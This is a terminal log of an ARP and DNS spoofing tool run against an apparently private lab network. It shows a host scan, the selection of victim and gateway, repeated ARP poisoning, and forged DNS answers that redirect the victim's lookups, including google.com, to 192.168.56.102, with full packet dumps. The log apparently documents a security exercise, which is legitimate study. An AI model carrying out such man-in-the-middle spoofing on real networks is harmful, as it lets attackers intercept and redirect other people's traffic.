attacker@M3 ~/Documents/Project $ sudo python3 main.py
=== ARP/DNS Spoofing Tool ===

Available network interfaces:
0: enp0s3
1: enp0s8
2: docker0
3: lo
Choose interface index: 0
[*] Scanning network: 192.168.56.0/24 on interface: enp0s3
[+] Found: 192.168.56.1 at 0a:00:27:00:00:00
[+] Found: 192.168.56.100 at 08:00:27:67:2e:dc
[+] Found: 192.168.56.101 at 08:00:27:b7:c4:af
[+] Found: 192.168.56.102 at 08:00:27:cc:08:6f

Select a victim:
0: 192.168.56.1 (0a:00:27:00:00:00)
1: 192.168.56.100 (08:00:27:67:2e:dc)
2: 192.168.56.101 (08:00:27:b7:c4:af)
3: 192.168.56.102 (08:00:27:cc:08:6f)
Enter index for victim: 2

Select a gateway:
0: 192.168.56.1 (0a:00:27:00:00:00)
1: 192.168.56.100 (08:00:27:67:2e:dc)
2: 192.168.56.101 (08:00:27:b7:c4:af)
3: 192.168.56.102 (08:00:27:cc:08:6f)
Enter index for gateway: 3

Enable DNS spoofing? (y/n): y
Enter fake IP (default = 192.168.56.102
[*] Starting ARP spoofing...
[*] Starting ARP spoofing...
[*] Starting DNS spoofing...
[*] Starting DNS spoofing (ALL domains)...
[*] Responding with fake IP: 192.168.56.102
[*] Listening on interface: enp0s3

[+] Sent ARP spoof packets to 192.168.56.101 and 192.168.56.102
[+] Sent ARP spoof packets to 192.168.56.101 and 192.168.56.102
[+] Sent ARP spoof packets to 192.168.56.101 and 192.168.56.102
[+] Sent ARP spoof packets to 192.168.56.101 and 192.168.56.102
[+] Sent ARP spoof packets to 192.168.56.101 and 192.168.56.102
[+] Sent ARP spoof packets to 192.168.56.101 and 192.168.56.102

[>] Intercepted packet...
[*] DNS query from 192.168.56.101 for domain: 103.56.168.192.in-addr.arpa
###[ Ethernet ]### 
  dst       = 08:00:27:d0:25:4b
  src       = 08:00:27:b7:c4:af
  type      = IPv4
###[ IP ]### 
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 73
     id        = 473
     flags     = 
     frag      = 0
     ttl       = 128
     proto     = udp
     chksum    = 0x46ae
     src       = 192.168.56.101
     dst       = 192.168.56.103
     \options   \
###[ UDP ]### 
        sport     = 1069
        dport     = domain
        len       = 53
        chksum    = 0x83e0
###[ DNS ]### 
           id        = 1
           qr        = 0
           opcode    = QUERY
           aa        = 0
           tc        = 0
           rd        = 1
           ra        = 0
           z         = 0
           ad        = 0
           cd        = 0
           rcode     = ok
           qdcount   = 1
           ancount   = 0
           nscount   = 0
           arcount   = 0
           \qd        \
            |###[ DNS Question Record ]### 
            |  qname     = '103.56.168.192.in-addr.arpa.'
            |  qtype     = PTR
            |  qclass    = IN
           an        = None
           ns        = None
           ar        = None

[+] Sending spoofed response with:
    - DNS ID: 1
    - Spoofed IP: 192.168.56.102
    - Destination IP: 192.168.56.101
###[ IP ]### 
  version   = 4
  ihl       = 5
  tos       = 0x0
  len       = 116
  id        = 1
  flags     = 
  frag      = 0
  ttl       = 64
  proto     = udp
  chksum    = 0x885b
  src       = 192.168.56.103
  dst       = 192.168.56.101
  \options   \
###[ UDP ]### 
     sport     = domain
     dport     = 1069
     len       = 96
     chksum    = 0xe250
###[ DNS ]### 
        id        = 1
        qr        = 1
        opcode    = QUERY
        aa        = 1
        tc        = 0
        rd        = 1
        ra        = 1
        z         = 0
        ad        = 0
        cd        = 0
        rcode     = ok
        qdcount   = 1
        ancount   = 1
        nscount   = 0
        arcount   = 0
        \qd        \
         |###[ DNS Question Record ]### 
         |  qname     = '103.56.168.192.in-addr.arpa.'
         |  qtype     = PTR
         |  qclass    = IN
        \an        \
         |###[ DNS Resource Record ]### 
         |  rrname    = '103.56.168.192.in-addr.arpa.'
         |  type      = A
         |  rclass    = IN
         |  ttl       = 300
         |  rdlen     = None
         |  rdata     = 192.168.56.102
        ns        = None
        ar        = None

.
Sent 1 packets.
[+] Spoofed DNS response sent successfully.

[>] Intercepted packet...
[*] DNS query from 192.168.56.101 for domain: google.com
###[ Ethernet ]### 
  dst       = 08:00:27:d0:25:4b
  src       = 08:00:27:b7:c4:af
  type      = IPv4
###[ IP ]### 
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 56
     id        = 474
     flags     = 
     frag      = 0
     ttl       = 128
     proto     = udp
     chksum    = 0x46be
     src       = 192.168.56.101
     dst       = 192.168.56.103
     \options   \
###[ UDP ]### 
        sport     = 1070
        dport     = domain
        len       = 36
        chksum    = 0xf56a
###[ DNS ]### 
           id        = 2
           qr        = 0
           opcode    = QUERY
           aa        = 0
           tc        = 0
           rd        = 1
           ra        = 0
           z         = 0
           ad        = 0
           cd        = 0
           rcode     = ok
           qdcount   = 1
           ancount   = 0
           nscount   = 0
           arcount   = 0
           \qd        \
            |###[ DNS Question Record ]### 
            |  qname     = 'google.com.'
            |  qtype     = A
            |  qclass    = IN
           an        = None
           ns        = None
           ar        = None

[+] Sending spoofed response with:
    - DNS ID: 2
    - Spoofed IP: 192.168.56.102
    - Destination IP: 192.168.56.101
###[ IP ]### 
  version   = 4
  ihl       = 5
  tos       = 0x0
  len       = 82
  id        = 1
  flags     = 
  frag      = 0
  ttl       = 64
  proto     = udp
  chksum    = 0x887d
  src       = 192.168.56.103
  dst       = 192.168.56.101
  \options   \
###[ UDP ]### 
     sport     = domain
     dport     = 1070
     len       = 62
     chksum    = 0x63be
###[ DNS ]### 
        id        = 2
        qr        = 1
        opcode    = QUERY
        aa        = 1
        tc        = 0
        rd        = 1
        ra        = 1
        z         = 0
        ad        = 0
        cd        = 0
        rcode     = ok
        qdcount   = 1
        ancount   = 1
        nscount   = 0
        arcount   = 0
        \qd        \
         |###[ DNS Question Record ]### 
         |  qname     = 'google.com.'
         |  qtype     = A
         |  qclass    = IN
        \an        \
         |###[ DNS Resource Record ]### 
         |  rrname    = 'google.com.'
         |  type      = A
         |  rclass    = IN
         |  ttl       = 300
         |  rdlen     = None
         |  rdata     = 192.168.56.102
        ns        = None
        ar        = None

.
Sent 1 packets.
[+] Spoofed DNS response sent successfully.

[>] Intercepted packet...

[>] Intercepted packet...
[+] Sent ARP spoof packets to 192.168.56.101 and 192.168.56.102
[+] Sent ARP spoof packets to 192.168.56.101 and 192.168.56.102
[+] Sent ARP spoof packets to 192.168.56.101 and 192.168.56.102
[+] Sent ARP spoof packets to 192.168.56.101 and 192.168.56.102
[+] Sent ARP spoof packets to 192.168.56.101 and 192.168.56.102
[+] Sent ARP spoof packets to 192.168.56.101 and 192.168.56.102
[+] Sent ARP spoof packets to 192.168.56.101 and 192.168.56.102
^C[*] Restoring ARP tables...
[+] ARP tables restored successfully.
[+] ARP tables restored.
[+] Cleanup complete. Exiting.
